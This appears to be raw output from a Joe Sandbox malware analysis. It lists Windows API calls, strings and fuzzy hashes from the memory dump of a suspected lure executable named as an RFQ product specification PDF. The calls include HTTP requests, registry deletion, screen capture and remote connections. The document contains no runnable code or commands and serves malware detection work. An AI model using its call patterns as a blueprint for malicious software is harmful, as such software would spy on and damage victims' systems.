                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ABC4C3
                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ABC4D7
                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00ABC4F0
                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00ABC533
                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00ABC549
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ABC554
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ABC584
                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ABC5DC
                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ABC5F0
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00ABC5FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3800310941-3916222277
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00AD8592
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85A2
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85AD
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85BA
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00AD85C8
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85D7
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AD85E0
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85E7
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85F8
                                                                                                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00ADFC38,?), ref: 00AD8611
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AD8621
                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00AD8641
                                                                                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00AD8671
                                                                                                                • DeleteObject.GDI32(?), ref: 00AD8699
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AD86AF
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3840717409-0
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00AB1502
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00AB150B
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AB1517
                                                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AB15FB
                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00AB1657
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AB1708
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AB178C
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AB17D8
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AB17E7
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00AB1823
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                • API String ID: 1234038744-3931177956
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00ACC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ACB6AE,?,?), ref: 00ACC9B5
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACC9F1
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA68
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA9E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ACB6F4
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ACB772
                                                                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 00ACB80A
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00ACB87E
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00ACB89C
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00ACB8F2
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00ACB904
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ACB922
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00ACB983
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00ACB994
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 146587525-4033151799
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00AC25D8
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00AC25E8
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00AC25F4
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00AC2601
                                                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00AC266D
                                                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00AC26AC
                                                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00AC26D0
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AC26D8
                                                                                                                • DeleteObject.GDI32(?), ref: 00AC26E1
                                                                                                                • DeleteDC.GDI32(?), ref: 00AC26E8
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00AC26F3
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                APIs
                                                                                                                • ___free_lconv_mon.LIBCMT ref: 00A7DAA1
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D659
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D66B
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D67D
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D68F
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6A1
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6B3
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6C5
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6D7
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6E9
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6FB
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D70D
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D71F
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D731
                                                                                                                • _free.LIBCMT ref: 00A7DA96
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A7DAB8
                                                                                                                • _free.LIBCMT ref: 00A7DACD
                                                                                                                • _free.LIBCMT ref: 00A7DAD8
                                                                                                                • _free.LIBCMT ref: 00A7DAFA
                                                                                                                • _free.LIBCMT ref: 00A7DB0D
                                                                                                                • _free.LIBCMT ref: 00A7DB1B
                                                                                                                • _free.LIBCMT ref: 00A7DB26
                                                                                                                • _free.LIBCMT ref: 00A7DB5E
                                                                                                                • _free.LIBCMT ref: 00A7DB65
                                                                                                                • _free.LIBCMT ref: 00A7DB82
                                                                                                                • _free.LIBCMT ref: 00A7DB9A
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                • String ID:
                                                                                                                • API String ID: 161543041-0
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00AA369C
                                                                                                                • _wcslen.LIBCMT ref: 00AA36A7
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AA3797
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00AA380C
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00AA385D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AA3882
                                                                                                                • GetParent.USER32(?), ref: 00AA38A0
                                                                                                                • ScreenToClient.USER32(00000000), ref: 00AA38A7
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00AA3921
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00AA395D
                                                                                                                Similarity
                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 4010501982-679674701
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00AA4994
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00AA49DA
                                                                                                                • _wcslen.LIBCMT ref: 00AA49EB
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00AA49F7
                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00AA4A2C
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00AA4A64
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00AA4A9D
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00AA4AE6
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00AA4B20
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AA4B8B
                                                                                                                Similarity
                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                • String ID: ThumbnailClass
                                                                                                                • API String ID: 1311036022-1241985126
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AD8D5A
                                                                                                                • GetFocus.USER32 ref: 00AD8D6A
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00AD8D75
                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00AD8E1D
                                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AD8ECF
                                                                                                                • GetMenuItemCount.USER32(?), ref: 00AD8EEC
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00AD8EFC
                                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AD8F2E
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AD8F70
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AD8FA1
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1026556194-4108050209
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AADC20
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AADC46
                                                                                                                • _wcslen.LIBCMT ref: 00AADC50
                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00AADCA0
                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AADCBC
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 1939486746-1459072770
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00ACCC64
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00ACCC8D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00ACCD48
                                                                                                                  • Part of subcall function 00ACCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00ACCCAA
                                                                                                                  • Part of subcall function 00ACCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00ACCCBD
                                                                                                                  • Part of subcall function 00ACCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00ACCCCF
                                                                                                                  • Part of subcall function 00ACCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00ACCD05
                                                                                                                  • Part of subcall function 00ACCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00ACCD28
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ACCCF3
                                                                                                                Similarity
                                                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 2734957052-4033151799
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AB3D40
                                                                                                                • _wcslen.LIBCMT ref: 00AB3D6D
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AB3D9D
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AB3DBE
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00AB3DCE
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AB3E55
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AB3E60
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AB3E6B
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                • String ID: :$\$\??\%s
                                                                                                                • API String ID: 1149970189-3457252023
                                                                                                                • Opcode ID: 5ff9334f181663ee0e78223047a7ded28f9c3f6c70840abd122dcf7272d492bc
                                                                                                                • Instruction ID: 470198cf38a40784c44423826bb08b24b2b237b41ffbfbf1dde4c7f9185a06f4
                                                                                                                • Opcode Fuzzy Hash: 5ff9334f181663ee0e78223047a7ded28f9c3f6c70840abd122dcf7272d492bc
                                                                                                                • Instruction Fuzzy Hash: D231AF72A4021AABDB20DBA0DC49FEF77BCEF88710F5041A6F619D6061EB709745CB24
                                                                                                                APIs
                                                                                                                • timeGetTime.WINMM ref: 00AAE6B4
                                                                                                                  • Part of subcall function 00A5E551: timeGetTime.WINMM(?,?,00AAE6D4), ref: 00A5E555
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00AAE6E1
                                                                                                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00AAE705
                                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AAE727
                                                                                                                • SetActiveWindow.USER32 ref: 00AAE746
                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AAE754
                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AAE773
                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00AAE77E
                                                                                                                • IsWindow.USER32 ref: 00AAE78A
                                                                                                                • EndDialog.USER32(00000000), ref: 00AAE79B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                • String ID: BUTTON
                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                • Opcode ID: d5100890c559b927b551ae3a8ecbd687e1f23f811de0a2361bdeed54e5915f74
                                                                                                                • Instruction ID: 56b7f60433836c6c9fbcbbd5d5325c4737470b9a7921b328fa8cfa8481dd81ee
                                                                                                                • Opcode Fuzzy Hash: d5100890c559b927b551ae3a8ecbd687e1f23f811de0a2361bdeed54e5915f74
                                                                                                                • Instruction Fuzzy Hash: 54218170200206FFEB00DFA4ED89B653B69F796759B905826F512831E1DF71AC21CA24
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AAEA5D
                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AAEA73
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AAEA84
                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AAEA96
                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AAEAA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: SendString$_wcslen
                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                • API String ID: 2420728520-1007645807
                                                                                                                • Opcode ID: 182717ce388e025ca350189af7f767b8ceb01e7c64525cc17090eba0c753c06c
                                                                                                                • Instruction ID: df9f3dab60ac3cde8738cc812ea960357904e072820e8ab681d95d4440b4a645
                                                                                                                • Opcode Fuzzy Hash: 182717ce388e025ca350189af7f767b8ceb01e7c64525cc17090eba0c753c06c
                                                                                                                • Instruction Fuzzy Hash: 64115E35A902597DE720E7A5DD4AEFF6FBCEBD6B40F400469B801A30E1EBB05925C5B0
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00AA5CE2
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AA5CFB
                                                                                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00AA5D59
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00AA5D69
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AA5D7B
                                                                                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00AA5DCF
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00AA5DDD
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AA5DEF
                                                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00AA5E31
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00AA5E44
                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AA5E5A
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00AA5E67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3096461208-0
                                                                                                                • Opcode ID: ae5818791e5f7880dcd5bb94dd1ab60b8d37bf6ff588f083a028a094db88bc06
                                                                                                                • Instruction ID: d0bdd49666ee64d6ba41e905e50f15c0c616aa51085a3766d1854ab62c5e6726
                                                                                                                • Opcode Fuzzy Hash: ae5818791e5f7880dcd5bb94dd1ab60b8d37bf6ff588f083a028a094db88bc06
                                                                                                                • Instruction Fuzzy Hash: CA510CB1E00606AFDF18CFA8DD89AAEBBB5FB49310F548129F516E7290D7709E01CB50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A58F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A58BE8,?,00000000,?,?,?,?,00A58BBA,00000000,?), ref: 00A58FC5
                                                                                                                • DestroyWindow.USER32(?), ref: 00A58C81
                                                                                                                • KillTimer.USER32(00000000,?,?,?,?,00A58BBA,00000000,?), ref: 00A58D1B
                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00A96973
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A58BBA,00000000,?), ref: 00A969A1
                                                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A58BBA,00000000,?), ref: 00A969B8
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A58BBA,00000000), ref: 00A969D4
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00A969E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 641708696-0
                                                                                                                • Opcode ID: 38a200a800ce201fc73983582c9fe73299cd1511b1cd82354ef68eab7933d243
                                                                                                                • Instruction ID: 9a5b92c028ad8192cf066e305fe367e40f2a5c16ee984f4d73f83b9e6bdd49b3
                                                                                                                • Opcode Fuzzy Hash: 38a200a800ce201fc73983582c9fe73299cd1511b1cd82354ef68eab7933d243
                                                                                                                • Instruction Fuzzy Hash: 49618931202601DFCF21DF19DA48B6977F1FF40363F548919E943AB960CB39A98ACB90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59944: GetWindowLongW.USER32(?,000000EB), ref: 00A59952
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00A59862
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ColorLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 259745315-0
                                                                                                                • Opcode ID: 7ecba849fd8d1b3a1609d43f27748ff7b521ffbeec2911f11d4184915a05bb7c
                                                                                                                • Instruction ID: 7aa70e50499eb08b2da2fb47ca73cfc9c8d9fb6153e2c4042f5dff6e67e9df59
                                                                                                                • Opcode Fuzzy Hash: 7ecba849fd8d1b3a1609d43f27748ff7b521ffbeec2911f11d4184915a05bb7c
                                                                                                                • Instruction Fuzzy Hash: 1C417131105651DFDF209F789C84BBA3BA5BB06372F544616F9A28F1E2D7319846DB20
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00A8F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00AA9717
                                                                                                                • LoadStringW.USER32(00000000,?,00A8F7F8,00000001), ref: 00AA9720
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A8F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00AA9742
                                                                                                                • LoadStringW.USER32(00000000,?,00A8F7F8,00000001), ref: 00AA9745
                                                                                                                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00AA9866
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                • API String ID: 747408836-2268648507
                                                                                                                • Opcode ID: 692820c60352edbbb460564bf9adf0cdbeb752226fb83848adac285e739781fe
                                                                                                                • Instruction ID: aeb3ce954abf6404f76f23efd353fa4b88c8a8c824e1ee4ede4406e41c778400
                                                                                                                • Opcode Fuzzy Hash: 692820c60352edbbb460564bf9adf0cdbeb752226fb83848adac285e739781fe
                                                                                                                • Instruction Fuzzy Hash: 0E410B72800219AADF04EBE0DE86EEFB778AF55341F500065F60577092EB356F59CBA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AA07A2
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AA07BE
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AA07DA
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AA0804
                                                                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00AA082C
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AA0837
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AA083C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 323675364-22481851
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AC3C5C
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AC3C8A
                                                                                                                • CoUninitialize.OLE32 ref: 00AC3C94
                                                                                                                • _wcslen.LIBCMT ref: 00AC3D2D
                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00AC3DB1
                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AC3ED5
                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00AC3F0E
                                                                                                                • CoGetObject.OLE32(?,00000000,00ADFB98,?), ref: 00AC3F2D
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00AC3F40
